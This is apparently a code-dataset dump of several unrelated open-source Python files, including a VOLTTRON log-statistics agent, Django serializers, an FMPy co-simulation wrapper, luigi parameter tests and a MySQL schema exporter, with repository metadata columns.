seconds=self.analysis_interval_sec)
self._scheduled_event = self.core.schedule(
next_update_time, self.publish_analysis)
def get_file_size(self):
try:
return os.path.getsize(self.file_path)
except OSError as e:
_log.error(e)
def main(argv=sys.argv):
"""Main method called by the platform."""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| en | 0.817641 | # -*- coding: utf-8 -*- {{{ # vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et: # # Copyright 2019, Battelle Memorial Institute. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # This material was prepared as an account of work sponsored by an agency of # the United States Government. Neither the United States Government nor the # United States Department of Energy, nor Battelle, nor any of their # employees, nor any jurisdiction or organization that has cooperated in the # development of these materials, makes any warranty, express or # implied, or assumes any legal liability or responsibility for the accuracy, # completeness, or usefulness or any information, apparatus, product, # software, or process disclosed, or represents that its use would not infringe # privately owned rights. Reference herein to any specific commercial product, # process, or service by trade name, trademark, manufacturer, or otherwise # does not necessarily constitute or imply its endorsement, recommendation, or # favoring by the United States Government or any agency thereof, or # Battelle Memorial Institute. The views and opinions of authors expressed # herein do not necessarily state or reflect those of the # United States Government or any agency thereof. # # PACIFIC NORTHWEST NATIONAL LABORATORY operated by # BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY # under Contract DE-AC05-76RL01830 # }}} Load the LogStatisticsAgent agent configuration and returns and instance of the agent created using that configuration. :param config_path: Path to a configuration file. :type config_path: str :returns: LogStatisticsAgent agent instance :rtype: LogStatisticsAgent agent LogStatisticsAgent reads volttron.log file size every hour, compute the size delta from previous hour and publish the difference with timestamp. It also publishes standard deviation every 24 hours. :param config: Configuration dict :type config: dict Example configuration: .. code-block:: python { "file_path" : "/home/volttron/volttron.log", "analysis_interval_sec" : 60, "publish_topic" : "platform/log_statistics", "historian_topic" : "analysis/log_statistics" } Publishes file's size increment in previous time interval (60 minutes) with timestamp. Also publishes standard deviation of file's hourly size differences every 24 hour. # read file size # calculate size delta Main method called by the platform. # Entry point for script | 1.190412 | 1 |
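The statistic the agent publishes is simply the hour-to-hour log-size delta plus, once 24 deltas have accumulated, their sample standard deviation. A stand-alone illustration with made-up byte counts:
import statistics
hourly_sizes = [1_000, 1_250, 1_600, 1_900]  # hypothetical log sizes in bytes
deltas = [b - a for a, b in zip(hourly_sizes, hourly_sizes[1:])]
print(deltas)                    # [250, 350, 300]
print(statistics.stdev(deltas))  # sample standard deviation of the deltas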
apps/inventory/serializers.py | sseits-skku/its-backend | 0 | 8022 | from rest_framework.serializers import ModelSerializer
from .models import Place, Status, OSType, Stock, ComputerStock
class PlaceSerializer(ModelSerializer):
class Meta:
model = Place
fields = '__all__'
class StatusSerializer(ModelSerializer):
class Meta:
model = Status
fields = '__all__'
class OSTypeSerializer(ModelSerializer):
class Meta:
model = OSType
fields = '__all__'
class StockSerializer(ModelSerializer):
class Meta:
model = Stock
fields = '__all__'
class ComputerStockSerializer(ModelSerializer):
class Meta:
model = ComputerStock
fields = '__all__'
| from rest_framework.serializers import ModelSerializer
from .models import Place, Status, OSType, Stock, ComputerStock
class PlaceSerializer(ModelSerializer):
class Meta:
model = Place
fields = '__all__'
class StatusSerializer(ModelSerializer):
class Meta:
model = Status
fields = '__all__'
class OSTypeSerializer(ModelSerializer):
class Meta:
model = OSType
fields = '__all__'
class StockSerializer(ModelSerializer):
class Meta:
model = Stock
fields = '__all__'
class ComputerStockSerializer(ModelSerializer):
class Meta:
model = ComputerStock
fields = '__all__'
| none | 1 | 2.090784 | 2 |
|
fmpy/cswrapper/__init__.py | CSchulzeTLK/FMPy | 225 | 8023 | <reponame>CSchulzeTLK/FMPy
def add_cswrapper(filename, outfilename=None):
from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__
from lxml import etree
import os
from shutil import copyfile, rmtree
if outfilename is None:
outfilename = filename
model_description = read_model_description(filename)
if model_description.fmiVersion != '2.0':
raise Exception("%s is not an FMI 2.0 FMU." % filename)
if model_description.modelExchange is None:
raise Exception("%s does not support Model Exchange." % filename)
unzipdir = extract(filename)
xml = os.path.join(unzipdir, 'modelDescription.xml')
tree = etree.parse(xml)
root = tree.getroot()
# update description
generation_tool = root.attrib.get('generationTool', 'Unknown') + " with FMPy %s Co-Simulation wrapper" % __version__
root.attrib['generationTool'] = generation_tool
# remove any existing <CoSimulation> element
for e in root.findall('CoSimulation'):
root.remove(e)
for i, child in enumerate(root):
if child.tag == 'ModelExchange':
break
model_identifier = '%s_%s_%s' % (model_description.modelExchange.modelIdentifier,
model_description.numberOfContinuousStates,
model_description.numberOfEventIndicators)
e = etree.Element("CoSimulation")
e.attrib['modelIdentifier'] = model_identifier
root.insert(i + 1, e)
tree.write(xml, pretty_print=True, encoding='utf-8')
shared_library = os.path.join(os.path.dirname(__file__), 'cswrapper' + sharedLibraryExtension)
license_file = os.path.join(os.path.dirname(__file__), 'license.txt')
licenses_dir = os.path.join(unzipdir, 'documentation', 'licenses')
if not os.path.isdir(licenses_dir):
os.mkdir(licenses_dir)
copyfile(src=shared_library, dst=os.path.join(unzipdir, 'binaries', platform, model_identifier + sharedLibraryExtension))
copyfile(license_file, os.path.join(unzipdir, 'documentation', 'licenses', 'fmpy-cswrapper.txt'))
create_zip_archive(outfilename, unzipdir)
rmtree(unzipdir, ignore_errors=True)
def create_zip_archive(filename, source_dir):
import zipfile
import os
with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zf:
base_path = os.path.normpath(source_dir)
for dirpath, dirnames, filenames in os.walk(source_dir):
for name in sorted(dirnames):
path = os.path.normpath(os.path.join(dirpath, name))
zf.write(path, os.path.relpath(path, base_path))
for name in filenames:
path = os.path.normpath(os.path.join(dirpath, name))
if os.path.isfile(path):
zf.write(path, os.path.relpath(path, base_path))
| def add_cswrapper(filename, outfilename=None):
from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__
from lxml import etree
import os
from shutil import copyfile, rmtree
if outfilename is None:
outfilename = filename
model_description = read_model_description(filename)
if model_description.fmiVersion != '2.0':
raise Exception("%s is not an FMI 2.0 FMU." % filename)
if model_description.modelExchange is None:
raise Exception("%s does not support Model Exchange." % filename)
unzipdir = extract(filename)
xml = os.path.join(unzipdir, 'modelDescription.xml')
tree = etree.parse(xml)
root = tree.getroot()
# update description
generation_tool = root.attrib.get('generationTool', 'Unknown') + " with FMPy %s Co-Simulation wrapper" % __version__
root.attrib['generationTool'] = generation_tool
# remove any existing <CoSimulation> element
for e in root.findall('CoSimulation'):
root.remove(e)
for i, child in enumerate(root):
if child.tag == 'ModelExchange':
break
model_identifier = '%s_%s_%s' % (model_description.modelExchange.modelIdentifier,
model_description.numberOfContinuousStates,
model_description.numberOfEventIndicators)
e = etree.Element("CoSimulation")
e.attrib['modelIdentifier'] = model_identifier
root.insert(i + 1, e)
tree.write(xml, pretty_print=True, encoding='utf-8')
shared_library = os.path.join(os.path.dirname(__file__), 'cswrapper' + sharedLibraryExtension)
license_file = os.path.join(os.path.dirname(__file__), 'license.txt')
licenses_dir = os.path.join(unzipdir, 'documentation', 'licenses')
if not os.path.isdir(licenses_dir):
os.mkdir(licenses_dir)
copyfile(src=shared_library, dst=os.path.join(unzipdir, 'binaries', platform, model_identifier + sharedLibraryExtension))
copyfile(license_file, os.path.join(unzipdir, 'documentation', 'licenses', 'fmpy-cswrapper.txt'))
create_zip_archive(outfilename, unzipdir)
rmtree(unzipdir, ignore_errors=True)
def create_zip_archive(filename, source_dir):
import zipfile
import os
with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zf:
base_path = os.path.normpath(source_dir)
for dirpath, dirnames, filenames in os.walk(source_dir):
for name in sorted(dirnames):
path = os.path.normpath(os.path.join(dirpath, name))
zf.write(path, os.path.relpath(path, base_path))
for name in filenames:
path = os.path.normpath(os.path.join(dirpath, name))
if os.path.isfile(path):
zf.write(path, os.path.relpath(path, base_path)) | en | 0.192361 | # update description # remove any existing <CoSimulation> element | 2.13795 | 2 |
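Hypothetical usage of the wrapper above: take a Model Exchange FMU and write a copy whose modelDescription.xml also advertises Co-Simulation through the FMPy wrapper library (file names are illustrative):
from fmpy.cswrapper import add_cswrapper
add_cswrapper("CoupledClutches.fmu", outfilename="CoupledClutches_cs.fmu")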
test/dict_parameter_test.py | shouldsee/luigi | 14,755 | 8024 | <gh_stars>1000+
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest, in_parse
import luigi
import luigi.interface
import json
import collections
class DictParameterTask(luigi.Task):
param = luigi.DictParameter()
class DictParameterTest(unittest.TestCase):
_dict = collections.OrderedDict([('username', 'me'), ('password', '<PASSWORD>')])
def test_parse(self):
d = luigi.DictParameter().parse(json.dumps(DictParameterTest._dict))
self.assertEqual(d, DictParameterTest._dict)
def test_serialize(self):
d = luigi.DictParameter().serialize(DictParameterTest._dict)
self.assertEqual(d, '{"username": "me", "password": "<PASSWORD>"}')
def test_parse_and_serialize(self):
inputs = ['{"username": "me", "password": "<PASSWORD>"}', '{"password": "<PASSWORD>", "username": "me"}']
for json_input in inputs:
_dict = luigi.DictParameter().parse(json_input)
self.assertEqual(json_input, luigi.DictParameter().serialize(_dict))
def test_parse_interface(self):
in_parse(["DictParameterTask", "--param", '{"username": "me", "password": "<PASSWORD>"}'],
lambda task: self.assertEqual(task.param, DictParameterTest._dict))
def test_serialize_task(self):
t = DictParameterTask(DictParameterTest._dict)
self.assertEqual(str(t), 'DictParameterTask(param={"username": "me", "password": "<PASSWORD>"})')
def test_parse_invalid_input(self):
self.assertRaises(ValueError, lambda: luigi.DictParameter().parse('{"invalid"}'))
def test_hash_normalize(self):
self.assertRaises(TypeError, lambda: hash(luigi.DictParameter().parse('{"a": {"b": []}}')))
a = luigi.DictParameter().normalize({"a": [{"b": []}]})
b = luigi.DictParameter().normalize({"a": [{"b": []}]})
self.assertEqual(hash(a), hash(b))
| # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest, in_parse
import luigi
import luigi.interface
import json
import collections
class DictParameterTask(luigi.Task):
param = luigi.DictParameter()
class DictParameterTest(unittest.TestCase):
_dict = collections.OrderedDict([('username', 'me'), ('password', '<PASSWORD>')])
def test_parse(self):
d = luigi.DictParameter().parse(json.dumps(DictParameterTest._dict))
self.assertEqual(d, DictParameterTest._dict)
def test_serialize(self):
d = luigi.DictParameter().serialize(DictParameterTest._dict)
self.assertEqual(d, '{"username": "me", "password": "<PASSWORD>"}')
def test_parse_and_serialize(self):
inputs = ['{"username": "me", "password": "<PASSWORD>"}', '{"password": "<PASSWORD>", "username": "me"}']
for json_input in inputs:
_dict = luigi.DictParameter().parse(json_input)
self.assertEqual(json_input, luigi.DictParameter().serialize(_dict))
def test_parse_interface(self):
in_parse(["DictParameterTask", "--param", '{"username": "me", "password": "<PASSWORD>"}'],
lambda task: self.assertEqual(task.param, DictParameterTest._dict))
def test_serialize_task(self):
t = DictParameterTask(DictParameterTest._dict)
self.assertEqual(str(t), 'DictParameterTask(param={"username": "me", "password": "<PASSWORD>"})')
def test_parse_invalid_input(self):
self.assertRaises(ValueError, lambda: luigi.DictParameter().parse('{"invalid"}'))
def test_hash_normalize(self):
self.assertRaises(TypeError, lambda: hash(luigi.DictParameter().parse('{"a": {"b": []}}')))
a = luigi.DictParameter().normalize({"a": [{"b": []}]})
b = luigi.DictParameter().normalize({"a": [{"b": []}]})
self.assertEqual(hash(a), hash(b)) | en | 0.840663 | # -*- coding: utf-8 -*- # # Copyright 2012-2015 Spotify AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # | 2.415882 | 2 |
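A quick sketch of the round-trip the tests above exercise: DictParameter.parse turns a JSON string into a (frozen) dict and serialize turns it back (values are illustrative):
import luigi
p = luigi.DictParameter()
d = p.parse('{"username": "me"}')
print(d["username"])   # me
print(p.serialize(d))  # {"username": "me"}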
echoscope/source/mysql_source.py | treeyh/echoscope | 1 | 8025 | # -*- coding: UTF-8 -*-
import logging
from typing import List
from echoscope.config import config
from echoscope.util import mysql_util, str_util, log_util
from echoscope.model import ds_model, config_model
from echoscope.source import source
class MysqlSource(source.Source):
def __init__(self):
self.excludesDb = ['information_schema', 'performance_schema', 'mysql', 'sys', 'test']
def export_model(self, conf: config_model.DataSourceConfig) -> ds_model.DataSourceModel:
mysqlUtil = mysql_util.get_mysql_util(
host=conf.host, port=conf.port, user=conf.user, passwd=<PASSWORD>, db=conf.db, charset=conf.charset)
ver = self.get_db_version(mysqlUtil)
if ver == '':
logging.error(' mysql conn fail. ')
return
dsm = ds_model.DataSourceModel(
name='%s:%d' % (conf.host, conf.port), dbType=config.DsMysql, version=ver)
dsm.dbs = self.get_export_dbs(mysqlUtil, conf.includes, conf.excludes)
dsm = self.fill_table_fields(mysqlUtil, dsm)
return dsm
def get_db_version(self, conn: mysql_util.MysqlUtil) -> str:
"""获取mysql版本
Args:
conn (mysql_util.MysqlUtil): [description]
Returns:
str: [description]
"""
sql = 'select version() as ver from dual'
cols = ['ver']
ver = conn.find_one(sql, (), cols)
return '' if ver == None else str_util.format_bytes_to_str(ver.get('ver', ''))
def get_export_dbs(self, conn: mysql_util.MysqlUtil, includes: List[str] = [], excludes: List[str] = []) -> List[ds_model.DbModel]:
"""获取需要导出结构的数据库列表
Args:
conn (mysql_util.MysqlUtil): 数据库连接
includes (List[str], optional): 需要包含的数据库列表. Defaults to [].
excludes (List[str], optional): 需要排除的数据库列表. Defaults to [].
Returns:
List[ds_model.DbModel]: 需要导出的数据库列表
"""
sql = 'select SCHEMA_NAME AS db_name, DEFAULT_CHARACTER_SET_NAME as charset, DEFAULT_COLLATION_NAME as collation_name from `information_schema`.SCHEMATA '
cols = ['db_name', 'charset', 'collation_name']
data = conn.find_all(sql, (), cols)
dbs = []
for d in data:
db_name = str_util.format_bytes_to_str(d['db_name'])
if db_name in self.excludesDb or db_name in excludes:
# needs to be filtered out
continue
if len(includes) > 0 and db_name not in includes:
# not in the include list
continue
charset = str_util.format_bytes_to_str(d['charset'])
collation_name = str_util.format_bytes_to_str(d['collation_name'])
dbModel = ds_model.DbModel(
name=db_name, charset=charset, collation_name=collation_name)
dbs.append(dbModel)
return dbs
def fill_table_fields(self, conn: mysql_util.MysqlUtil, dsModel: ds_model.DataSourceModel) -> ds_model.DataSourceModel:
"""获取数据库中的表信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dsModel (ds_model.DataSourceModel): 数据源,包含数据库列表
Returns:
ds_model.DataSourceModel: 数据源
"""
sql = ''' select TABLE_NAME, `ENGINE`, TABLE_COLLATION, TABLE_COMMENT from information_schema.`TABLES` where TABLE_SCHEMA = %s and TABLE_TYPE = 'BASE TABLE' '''
cols = ['TABLE_NAME', 'ENGINE', 'TABLE_COLLATION', 'TABLE_COMMENT']
for db in dsModel.dbs:
data = conn.find_all(sql, (db.name, ), cols)
tables: ds_model.TableModel = []
for d in data:
tableName = str_util.format_bytes_to_str(d['TABLE_NAME'])
comment = str_util.format_bytes_to_str(d['TABLE_COMMENT'])
collation_name = str_util.format_bytes_to_str(d['TABLE_COLLATION'])
engine = str_util.format_bytes_to_str(d['ENGINE'])
table = ds_model.TableModel(
name=tableName, comment=comment, collation_name=collation_name, engine=engine)
logging.info('load table:%s fields.' % tableName)
table.fields = self.get_fields(conn, db.name, tableName)
table.create_script = self.get_create_script(conn, db.name, tableName)
tables.append(table)
db.tables = tables
return dsModel
def get_create_script(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> str:
"""获取表的创建脚本
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名称
tableName (str): 表名称
Returns:
str: 创建脚本
"""
sql = ''' SHOW CREATE TABLE `%s`.`%s` ''' % (dbName, tableName)
cols = ['Table', 'Create Table']
data = conn.find_one(sql, (), cols)
return '' if data == None else str_util.format_bytes_to_str(data.get('Create Table', ''))
def get_fields(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> List[ds_model.FieldModel]:
"""获取数据表中列信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名
tableName (str): 表名
Returns:
List[ds_model.FieldModel]: 列列表
"""
sql = ''' select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, ORDINAL_POSITION, COLUMN_DEFAULT, IS_NULLABLE, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, NUMERIC_PRECISION, NUMERIC_SCALE, CHARACTER_SET_NAME, COLLATION_NAME, COLUMN_TYPE, COLUMN_KEY, EXTRA, COLUMN_COMMENT from information_schema.`columns` where TABLE_SCHEMA = %s and TABLE_NAME = %s ORDER BY TABLE_SCHEMA DESC, TABLE_NAME DESC, ORDINAL_POSITION ASC '''
cols = ['TABLE_SCHEMA', 'TABLE_NAME', 'COLUMN_NAME', 'ORDINAL_POSITION', 'COLUMN_DEFAULT',
'IS_NULLABLE', 'DATA_TYPE', 'CHARACTER_MAXIMUM_LENGTH', 'NUMERIC_PRECISION', 'NUMERIC_SCALE',
'CHARACTER_SET_NAME', 'COLLATION_NAME', 'COLUMN_TYPE', 'COLUMN_KEY', 'EXTRA', 'COLUMN_COMMENT']
data = conn.find_all(sql, (dbName, tableName, ), cols)
fields = []
for d in data:
fname = str_util.format_bytes_to_str(d['COLUMN_NAME'])
ftype = str_util.format_bytes_to_str(d['DATA_TYPE'])
column_type = str_util.format_bytes_to_str(d['COLUMN_TYPE'])
length = str_util.format_bytes_to_str(
d['CHARACTER_MAXIMUM_LENGTH']) if d['CHARACTER_MAXIMUM_LENGTH'] != None else str_util.format_bytes_to_str(d['NUMERIC_PRECISION'])
scale = str_util.format_bytes_to_str(d['NUMERIC_SCALE'])
# on update CURRENT_TIMESTAMP
default = str_util.format_bytes_to_str(d['COLUMN_DEFAULT'])
ext = str_util.format_bytes_to_str(d['EXTRA'])
if default == 'CURRENT_TIMESTAMP':
if 'on update CURRENT_TIMESTAMP' in ext:
default = 'update_time'
else:
default = 'create_time'
nullFlag = str_util.format_bytes_to_str(d['IS_NULLABLE'])
comment = str_util.format_bytes_to_str(d['COLUMN_COMMENT'])
charset = str_util.format_bytes_to_str(d['CHARACTER_SET_NAME'])
collation_name = str_util.format_bytes_to_str(d['COLLATION_NAME'])
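      # indexFlag: 0 = no index, 1 = primary key (PRI), 2 = normal index (MUL), 3 = unique (UNI)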
indexFlag = 0
column_key = str_util.format_bytes_to_str(d['COLUMN_KEY'])
if column_key == 'PRI':
indexFlag = 1
elif column_key == 'UNI':
indexFlag = 3
elif column_key == 'MUL':
indexFlag = 2
indexName = ''
autoInc = False
if 'auto_increment' in ext:
autoInc = True
field = ds_model.FieldModel(name=fname, ftype=ftype, length=length, scale=scale, default=default, nullFlag=nullFlag,
comment=comment, charset=charset, collation_name=collation_name, indexFlag=indexFlag, indexName=indexName, autoInc=autoInc)
fields.append(field)
return fields
| # -*- coding: UTF-8 -*-
import logging
from typing import List
from echoscope.config import config
from echoscope.util import mysql_util, str_util, log_util
from echoscope.model import ds_model, config_model
from echoscope.source import source
class MysqlSource(source.Source):
def __init__(self):
self.excludesDb = ['information_schema', 'performance_schema', 'mysql', 'sys', 'test']
def export_model(self, conf: config_model.DataSourceConfig) -> ds_model.DataSourceModel:
mysqlUtil = mysql_util.get_mysql_util(
host=conf.host, port=conf.port, user=conf.user, passwd=<PASSWORD>, db=conf.db, charset=conf.charset)
ver = self.get_db_version(mysqlUtil)
if ver == '':
logging.error(' mysql conn fail. ')
return
dsm = ds_model.DataSourceModel(
name='%s:%d' % (conf.host, conf.port), dbType=config.DsMysql, version=ver)
dsm.dbs = self.get_export_dbs(mysqlUtil, conf.includes, conf.excludes)
dsm = self.fill_table_fields(mysqlUtil, dsm)
return dsm
def get_db_version(self, conn: mysql_util.MysqlUtil) -> str:
"""获取mysql版本
Args:
conn (mysql_util.MysqlUtil): [description]
Returns:
str: [description]
"""
sql = 'select version() as ver from dual'
cols = ['ver']
ver = conn.find_one(sql, (), cols)
return '' if ver == None else str_util.format_bytes_to_str(ver.get('ver', ''))
def get_export_dbs(self, conn: mysql_util.MysqlUtil, includes: List[str] = [], excludes: List[str] = []) -> List[ds_model.DbModel]:
"""获取需要导出结构的数据库列表
Args:
conn (mysql_util.MysqlUtil): 数据库连接
includes (List[str], optional): 需要包含的数据库列表. Defaults to [].
excludes (List[str], optional): 需要排除的数据库列表. Defaults to [].
Returns:
List[ds_model.DbModel]: 需要导出的数据库列表
"""
sql = 'select SCHEMA_NAME AS db_name, DEFAULT_CHARACTER_SET_NAME as charset, DEFAULT_COLLATION_NAME as collation_name from `information_schema`.SCHEMATA '
cols = ['db_name', 'charset', 'collation_name']
data = conn.find_all(sql, (), cols)
dbs = []
for d in data:
db_name = str_util.format_bytes_to_str(d['db_name'])
if db_name in self.excludesDb or db_name in excludes:
        # filter out this database
continue
if len(includes) > 0 and db_name not in includes:
        # not in the include list
continue
charset = str_util.format_bytes_to_str(d['charset'])
collation_name = str_util.format_bytes_to_str(d['collation_name'])
dbModel = ds_model.DbModel(
name=db_name, charset=charset, collation_name=collation_name)
dbs.append(dbModel)
return dbs
def fill_table_fields(self, conn: mysql_util.MysqlUtil, dsModel: ds_model.DataSourceModel) -> ds_model.DataSourceModel:
"""获取数据库中的表信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dsModel (ds_model.DataSourceModel): 数据源,包含数据库列表
Returns:
ds_model.DataSourceModel: 数据源
"""
sql = ''' select TABLE_NAME, `ENGINE`, TABLE_COLLATION, TABLE_COMMENT from information_schema.`TABLES` where TABLE_SCHEMA = %s and TABLE_TYPE = 'BASE TABLE' '''
cols = ['TABLE_NAME', 'ENGINE', 'TABLE_COLLATION', 'TABLE_COMMENT']
for db in dsModel.dbs:
data = conn.find_all(sql, (db.name, ), cols)
tables: ds_model.TableModel = []
for d in data:
tableName = str_util.format_bytes_to_str(d['TABLE_NAME'])
comment = str_util.format_bytes_to_str(d['TABLE_COMMENT'])
collation_name = str_util.format_bytes_to_str(d['TABLE_COLLATION'])
engine = str_util.format_bytes_to_str(d['ENGINE'])
table = ds_model.TableModel(
name=tableName, comment=comment, collation_name=collation_name, engine=engine)
logging.info('load table:%s fields.' % tableName)
table.fields = self.get_fields(conn, db.name, tableName)
table.create_script = self.get_create_script(conn, db.name, tableName)
tables.append(table)
db.tables = tables
return dsModel
def get_create_script(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> str:
"""获取表的创建脚本
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名称
tableName (str): 表名称
Returns:
str: 创建脚本
"""
sql = ''' SHOW CREATE TABLE `%s`.`%s` ''' % (dbName, tableName)
cols = ['Table', 'Create Table']
data = conn.find_one(sql, (), cols)
return '' if data == None else str_util.format_bytes_to_str(data.get('Create Table', ''))
def get_fields(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> List[ds_model.FieldModel]:
"""获取数据表中列信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名
tableName (str): 表名
Returns:
List[ds_model.FieldModel]: 列列表
"""
sql = ''' select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, ORDINAL_POSITION, COLUMN_DEFAULT, IS_NULLABLE, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, NUMERIC_PRECISION, NUMERIC_SCALE, CHARACTER_SET_NAME, COLLATION_NAME, COLUMN_TYPE, COLUMN_KEY, EXTRA, COLUMN_COMMENT from information_schema.`columns` where TABLE_SCHEMA = %s and TABLE_NAME = %s ORDER BY TABLE_SCHEMA DESC, TABLE_NAME DESC, ORDINAL_POSITION ASC '''
cols = ['TABLE_SCHEMA', 'TABLE_NAME', 'COLUMN_NAME', 'ORDINAL_POSITION', 'COLUMN_DEFAULT',
'IS_NULLABLE', 'DATA_TYPE', 'CHARACTER_MAXIMUM_LENGTH', 'NUMERIC_PRECISION', 'NUMERIC_SCALE',
'CHARACTER_SET_NAME', 'COLLATION_NAME', 'COLUMN_TYPE', 'COLUMN_KEY', 'EXTRA', 'COLUMN_COMMENT']
data = conn.find_all(sql, (dbName, tableName, ), cols)
fields = []
for d in data:
fname = str_util.format_bytes_to_str(d['COLUMN_NAME'])
ftype = str_util.format_bytes_to_str(d['DATA_TYPE'])
      column_type = str_util.format_bytes_to_str(d['COLUMN_TYPE'])
length = str_util.format_bytes_to_str(
d['CHARACTER_MAXIMUM_LENGTH']) if d['CHARACTER_MAXIMUM_LENGTH'] != None else str_util.format_bytes_to_str(d['NUMERIC_PRECISION'])
scale = str_util.format_bytes_to_str(d['NUMERIC_SCALE'])
# on update CURRENT_TIMESTAMP
default = str_util.format_bytes_to_str(d['COLUMN_DEFAULT'])
ext = str_util.format_bytes_to_str(d['EXTRA'])
if default == 'CURRENT_TIMESTAMP':
if 'on update CURRENT_TIMESTAMP' in ext:
default = 'update_time'
else:
default = 'create_time'
nullFlag = str_util.format_bytes_to_str(d['IS_NULLABLE'])
comment = str_util.format_bytes_to_str(d['COLUMN_COMMENT'])
charset = str_util.format_bytes_to_str(d['CHARACTER_SET_NAME'])
collation_name = str_util.format_bytes_to_str(d['COLLATION_NAME'])
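      # indexFlag: 0 = no index, 1 = primary key (PRI), 2 = normal index (MUL), 3 = unique (UNI)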
indexFlag = 0
column_key = str_util.format_bytes_to_str(d['COLUMN_KEY'])
if column_key == 'PRI':
indexFlag = 1
elif column_key == 'UNI':
indexFlag = 3
elif column_key == 'MUL':
indexFlag = 2
indexName = ''
autoInc = False
if 'auto_increment' in ext:
autoInc = True
field = ds_model.FieldModel(name=fname, ftype=ftype, length=length, scale=scale, default=default, nullFlag=nullFlag,
comment=comment, charset=charset, collation_name=collation_name, indexFlag=indexFlag, indexName=indexName, autoInc=autoInc)
fields.append(field)
return fields
| zh | 0.331683 | # -*- coding: UTF-8 -*- 获取mysql版本 Args: conn (mysql_util.MysqlUtil): [description] Returns: str: [description] 获取需要导出结构的数据库列表 Args: conn (mysql_util.MysqlUtil): 数据库连接 includes (List[str], optional): 需要包含的数据库列表. Defaults to []. excludes (List[str], optional): 需要排除的数据库列表. Defaults to []. Returns: List[ds_model.DbModel]: 需要导出的数据库列表 # 需要过滤 # 不包含在include中 获取数据库中的表信息 Args: conn (mysql_util.MysqlUtil): 数据库连接 dsModel (ds_model.DataSourceModel): 数据源,包含数据库列表 Returns: ds_model.DataSourceModel: 数据源 select TABLE_NAME, `ENGINE`, TABLE_COLLATION, TABLE_COMMENT from information_schema.`TABLES` where TABLE_SCHEMA = %s and TABLE_TYPE = 'BASE TABLE' 获取表的创建脚本 Args: conn (mysql_util.MysqlUtil): 数据库连接 dbName (str): 数据库名称 tableName (str): 表名称 Returns: str: 创建脚本 SHOW CREATE TABLE `%s`.`%s` 获取数据表中列信息 Args: conn (mysql_util.MysqlUtil): 数据库连接 dbName (str): 数据库名 tableName (str): 表名 Returns: List[ds_model.FieldModel]: 列列表 select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, ORDINAL_POSITION, COLUMN_DEFAULT, IS_NULLABLE, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, NUMERIC_PRECISION, NUMERIC_SCALE, CHARACTER_SET_NAME, COLLATION_NAME, COLUMN_TYPE, COLUMN_KEY, EXTRA, COLUMN_COMMENT from information_schema.`columns` where TABLE_SCHEMA = %s and TABLE_NAME = %s ORDER BY TABLE_SCHEMA DESC, TABLE_NAME DESC, ORDINAL_POSITION ASC # on update CURRENT_TIMESTAMP | 2.173562 | 2 |
lib/XChemPANDDA.py | graeme-winter/XChemExplorer | 2 | 8026 | # last edited: 10/08/2017, 10:25
import os, sys, glob, subprocess
from datetime import datetime
from PyQt4 import QtGui, QtCore
import math
#from XChemUtils import mtztools
import XChemDB
import XChemRefine
import XChemUtils
import XChemLog
import XChemToolTips
import csv
try:
import gemmi
import pandas
except ImportError:
pass
#def get_names_of_current_clusters(xce_logfile,panddas_directory):
# Logfile=XChemLog.updateLog(xce_logfile)
# Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory))
# os.chdir('{0!s}/cluster_analysis'.format(panddas_directory))
# cluster_dict={}
# for out_dir in sorted(glob.glob('*')):
# if os.path.isdir(out_dir):
# cluster_dict[out_dir]=[]
# found_first_pdb=False
